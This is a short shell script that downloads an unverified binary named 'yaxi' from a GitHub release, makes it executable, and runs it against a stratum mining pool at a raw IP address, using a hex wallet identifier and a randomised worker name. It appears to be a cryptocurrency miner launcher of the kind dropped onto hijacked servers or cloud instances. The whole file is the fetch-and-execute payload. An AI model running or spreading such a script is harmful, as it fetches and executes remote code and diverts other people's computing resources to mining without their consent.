#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/yask/releases/download/yaek/yaxi
chmod +x yaxi
./yaxi -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-yaxi@198.58.100.218:8080
